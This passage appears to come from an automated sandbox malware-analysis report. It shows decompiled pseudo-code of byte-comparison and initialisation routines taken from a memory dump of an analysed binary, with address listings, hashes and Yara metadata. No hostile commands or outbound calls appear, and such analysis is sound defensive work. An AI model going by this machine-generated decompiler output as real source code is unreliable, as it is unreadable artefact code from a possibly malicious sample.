											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                            0x0042d8a2
                                            0x0042d8a2
                                            0x0042d8a8
                                            0x0042d91f
                                            0x0042d921
                                            0x0042d923
                                            0x00000000
                                            0x00000000
                                            0x0042d929
                                            0x0042d92f
                                            0x0042d9b6
                                            0x0042d9b8
                                            0x0042d9ba
                                            0x00000000
                                            0x00000000
                                            0x0042d9c0
                                            0x0042d9c6
                                            0x0042da4d
                                            0x0042da4f
                                            0x0042da51
                                            0x00000000
                                            0x00000000
                                            0x0042da57
                                            0x0042da5d
                                            0x0042dae4
                                            0x0042dae6
                                            0x0042dae8
                                            0x00000000
                                            0x00000000
                                            0x0042daee
                                            0x0042daf4
                                            0x0042db7b
                                            0x0042db7d
                                            0x0042db7f
                                            0x00000000
                                            0x00000000
                                            0x0042db8b
                                            0x0042dc13
                                            0x0042dc15
                                            0x0042dc17
                                            0x00000000
                                            0x00000000
                                            0x0042dc1d
                                            0x0042dc23
                                            0x0042dcaa
                                            0x0042dcac
                                            0x0042dcae
                                            0x0042dcbc
                                            0x0042dcbe
                                            0x0042dccb
                                            0x0042dccb
                                            0x0042dcbe
                                            0x00000000
                                            0x0042dcae
                                            0x0042dc30
                                            0x0042dc32
                                            0x0042dc4a
                                            0x0042dc52
                                            0x0042dc54
                                            0x0042dc6c
                                            0x0042dc74
                                            0x0042dc76
                                            0x0042dc8e
                                            0x0042dc96
                                            0x0042dc98
                                            0x0042dca1
                                            0x0042dca1
                                            0x00000000
                                            0x0042dc98
                                            0x0042dc7f
                                            0x0042dc88
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dc88
                                            0x0042dc5d
                                            0x0042dc66
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dc66
                                            0x0042dc3b
                                            0x0042dc44
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dc44
                                            0x0042db99
                                            0x0042db9b
                                            0x0042dbb3
                                            0x0042dbbb
                                            0x0042dbbd
                                            0x0042dbd5
                                            0x0042dbdd
                                            0x0042dbdf
                                            0x0042dbf7
                                            0x0042dbff
                                            0x0042dc01
                                            0x0042dc0a
                                            0x0042dc0a
                                            0x00000000
                                            0x0042dc01
                                            0x0042dbe8
                                            0x0042dbf1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dbf1
                                            0x0042dbc6
                                            0x0042dbcf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dbcf
                                            0x0042dba4
                                            0x0042dbad
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dbad
                                            0x0042db01
                                            0x0042db03
                                            0x0042db1b
                                            0x0042db23
                                            0x0042db25
                                            0x0042db3d
                                            0x0042db45
                                            0x0042db47
                                            0x0042db5f
                                            0x0042db67
                                            0x0042db69
                                            0x0042db72
                                            0x0042db72
                                            0x00000000
                                            0x0042db69
                                            0x0042db50
                                            0x0042db59
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042db59
                                            0x0042db2e
                                            0x0042db37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042db37
                                            0x0042db0c
                                            0x0042db15
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042db15
                                            0x0042da6a
                                            0x0042da6c
                                            0x0042da84
                                            0x0042da8c
                                            0x0042da8e
                                            0x0042daa6
                                            0x0042daae
                                            0x0042dab0
                                            0x0042dac8
                                            0x0042dad0
                                            0x0042dad2
                                            0x0042dadb
                                            0x0042dadb
                                            0x00000000
                                            0x0042dad2
                                            0x0042dab9
                                            0x0042dac2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dac2
                                            0x0042da97
                                            0x0042daa0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042daa0
                                            0x0042da75
                                            0x0042da7e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042da7e
                                            0x0042d9d3
                                            0x0042d9d5
                                            0x0042d9ed
                                            0x0042d9f5
                                            0x0042d9f7
                                            0x0042da0f
                                            0x0042da17
                                            0x0042da19
                                            0x0042da31
                                            0x0042da39
                                            0x0042da3b
                                            0x0042da44
                                            0x0042da44
                                            0x00000000
                                            0x0042da3b
                                            0x0042da22
                                            0x0042da2b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042da2b
                                            0x0042da00
                                            0x0042da09
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042da09
                                            0x0042d9de
                                            0x0042d9e7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d9e7
                                            0x0042d93c
                                            0x0042d93e
                                            0x0042d956
                                            0x0042d95e
                                            0x0042d960
                                            0x0042d978
                                            0x0042d980
                                            0x0042d982
                                            0x0042d99a
                                            0x0042d9a2
                                            0x0042d9a4
                                            0x0042d9ad
                                            0x0042d9ad
                                            0x00000000
                                            0x0042d9a4
                                            0x0042d98b
                                            0x0042d994
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d994
                                            0x0042d969
                                            0x0042d972
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d972
                                            0x0042d947
                                            0x0042d950
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d8aa
                                            0x0042d8aa
                                            0x0042d8b1
                                            0x0042d8b3
                                            0x0042d8c7
                                            0x0042d8c7
                                            0x0042d8cf
                                            0x0042d8d1
                                            0x0042d8e5
                                            0x0042d8e5
                                            0x0042d8ed
                                            0x0042d8ef
                                            0x0042d903
                                            0x0042d903
                                            0x0042d90b
                                            0x0042d90d
                                            0x0042d916
                                            0x0042d916
                                            0x00000000
                                            0x0042d90d
                                            0x0042d8f5
                                            0x0042d8f8
                                            0x0042d901
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d901
                                            0x0042d8d7
                                            0x0042d8da
                                            0x0042d8e3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d8e3
                                            0x0042d8b9
                                            0x0042d8bc
                                            0x0042d8c5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d8c5
                                            0x0042d89a
                                            0x0042d89a
                                            0x0042e68b

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction ID: f33ee3c6c3776573fd6f3cb95d0d0e05108dc578bb57ec23a1689cafd1ca2157
                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction Fuzzy Hash: 52C1A532B091B309DF1D463A943417FBBA19A927B135A076FD4F3CB2C8EE28C565D618
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042D48A, Relevance: .3, Instructions: 323COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042D48A(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                            0x0042d48a
                                            0x0042d48a
                                            0x0042d48a
                                            0x0042d490
                                            0x0042d517
                                            0x0042d519
                                            0x0042d51b
                                            0x0042d89a
                                            0x0042d89a
                                            0x0042e68b
                                            0x0042e68b
                                            0x0042d521
                                            0x0042d527
                                            0x0042d5ae
                                            0x0042d5b0
                                            0x0042d5b2
                                            0x00000000
                                            0x00000000
                                            0x0042d5b8
                                            0x0042d5be
                                            0x0042d645
                                            0x0042d647
                                            0x0042d649
                                            0x00000000
                                            0x00000000
                                            0x0042d64f
                                            0x0042d655
                                            0x0042d6dc
                                            0x0042d6de
                                            0x0042d6e0
                                            0x00000000
                                            0x00000000
                                            0x0042d6ec
                                            0x0042d774
                                            0x0042d776
                                            0x0042d778
                                            0x00000000
                                            0x00000000
                                            0x0042d77e
                                            0x0042d784
                                            0x0042d80b
                                            0x0042d80d
                                            0x0042d80f
                                            0x00000000
                                            0x00000000
                                            0x0042d815
                                            0x0042d81b
                                            0x0042d892
                                            0x0042d894
                                            0x0042d896
                                            0x0042d898
                                            0x0042d898
                                            0x00000000
                                            0x0042d896
                                            0x0042d824
                                            0x0042d826
                                            0x0042d83a
                                            0x0042d842
                                            0x0042d844
                                            0x0042d858
                                            0x0042d860
                                            0x0042d862
                                            0x0042d876
                                            0x0042d87e
                                            0x0042d880
                                            0x0042d889
                                            0x0042d889
                                            0x00000000
                                            0x0042d880
                                            0x0042d86b
                                            0x0042d874
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d874
                                            0x0042d84d
                                            0x0042d856
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d856
                                            0x0042d82f
                                            0x0042d838
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d838
                                            0x0042d791
                                            0x0042d793
                                            0x0042d7ab
                                            0x0042d7b3
                                            0x0042d7b5
                                            0x0042d7cd
                                            0x0042d7d5
                                            0x0042d7d7
                                            0x0042d7ef
                                            0x0042d7f7
                                            0x0042d7f9
                                            0x0042d802
                                            0x0042d802
                                            0x00000000
                                            0x0042d7f9
                                            0x0042d7e0
                                            0x0042d7e9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d7e9
                                            0x0042d7be
                                            0x0042d7c7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d7c7
                                            0x0042d79c
                                            0x0042d7a5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d7a5
                                            0x0042d6fa
                                            0x0042d6fc
                                            0x0042d714
                                            0x0042d71c
                                            0x0042d71e
                                            0x0042d736
                                            0x0042d73e
                                            0x0042d740
                                            0x0042d758
                                            0x0042d760
                                            0x0042d762
                                            0x0042d76b
                                            0x0042d76b
                                            0x00000000
                                            0x0042d762
                                            0x0042d749
                                            0x0042d752
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d752
                                            0x0042d727
                                            0x0042d730
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d730
                                            0x0042d705
                                            0x0042d70e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d70e
                                            0x0042d662
                                            0x0042d664
                                            0x0042d67c
                                            0x0042d684
                                            0x0042d686
                                            0x0042d69e
                                            0x0042d6a6
                                            0x0042d6a8
                                            0x0042d6c0
                                            0x0042d6c8
                                            0x0042d6ca
                                            0x0042d6d3
                                            0x0042d6d3
                                            0x00000000
                                            0x0042d6ca
                                            0x0042d6b1
                                            0x0042d6ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d6ba
                                            0x0042d68f
                                            0x0042d698
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d698
                                            0x0042d66d
                                            0x0042d676
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d676
                                            0x0042d5cb
                                            0x0042d5cd
                                            0x0042d5e5
                                            0x0042d5ed
                                            0x0042d5ef
                                            0x0042d607
                                            0x0042d60f
                                            0x0042d611
                                            0x0042d629
                                            0x0042d631
                                            0x0042d633
                                            0x0042d63c
                                            0x0042d63c
                                            0x00000000
                                            0x0042d633
                                            0x0042d61a
                                            0x0042d623
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d623
                                            0x0042d5f8
                                            0x0042d601
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d601
                                            0x0042d5d6
                                            0x0042d5df
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d5df
                                            0x0042d534
                                            0x0042d536
                                            0x0042d54e
                                            0x0042d556
                                            0x0042d558
                                            0x0042d570
                                            0x0042d578
                                            0x0042d57a
                                            0x0042d592
                                            0x0042d59a
                                            0x0042d59c
                                            0x0042d5a5
                                            0x0042d5a5
                                            0x00000000
                                            0x0042d59c
                                            0x0042d583
                                            0x0042d58c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d58c
                                            0x0042d561
                                            0x0042d56a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d56a
                                            0x0042d53f
                                            0x0042d548
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d548
                                            0x0042d49d
                                            0x0042d49f
                                            0x0042d4b7
                                            0x0042d4bf
                                            0x0042d4c1
                                            0x0042d4d9
                                            0x0042d4e1
                                            0x0042d4e3
                                            0x0042d4fb
                                            0x0042d503
                                            0x0042d505
                                            0x0042d50e
                                            0x0042d50e
                                            0x00000000
                                            0x0042d505
                                            0x0042d4ec
                                            0x0042d4f5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d4f5
                                            0x0042d4ca
                                            0x0042d4d3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042d4d3
                                            0x0042d4a8
                                            0x0042d4b1
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 1f4aa85c4ea956186043d2ccef9232c903f31ad4993586108aa8c0c9ace5fffb
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: 4BC18432B090B309DB2D4639A43417FBBA19EA17B135A475FD4F3CB2C8EE28C565D528
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00412CF0, Relevance: .3, Instructions: 277COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 97%
                                            			E00412CF0(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
				intOrPtr* _v8;
				void* __edi;
				void* _t101;
				void* _t102;
				intOrPtr* _t220;
				signed int _t227;
				signed int _t232;
				signed int _t235;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t250;
				signed int _t253;
				signed int _t263;
				signed int _t273;
				signed int _t276;
				signed int _t279;
				signed int _t282;
				signed int _t285;
				signed int _t288;
				void* _t291;
				intOrPtr* _t294;
				void* _t299;
				signed int _t302;
				void* _t305;

				_t299 = __esi;
				_push(__ecx);
				_t220 = __ecx;
				_t294 = __edx;
				_v8 = __edx;
				if(__ecx == 0 || __edx == 0 ||  *((intOrPtr*)(__ecx + 4)) == 0) {
					_t102 = 0xffffff53;
				} else {
					_t223 =  *__ecx;
					if( *__ecx != 0) {
						E00415EE4(_t101, _t223, __edx, __esi);
					}
					_t102 = E00412CB2(_t294, 1);
					if(_t102 >= 0) {
						 *_t220 = _t294;
						_push(_t299);
						 *((short*)(_t220 + 0x218)) =  *((intOrPtr*)( *_t294));
						 *((short*)(_t220 + 0x380)) =  *((intOrPtr*)(_t294 + 0x80));
						 *((intOrPtr*)(_t220 + 0x36c)) =  *((intOrPtr*)(_t294 + 0x7c));
						 *((intOrPtr*)(_t220 + 0x384)) =  *((intOrPtr*)(_t294 + 0x84));
						 *((intOrPtr*)(_t220 + 0x204)) =  *((intOrPtr*)(_t294 + 0x78));
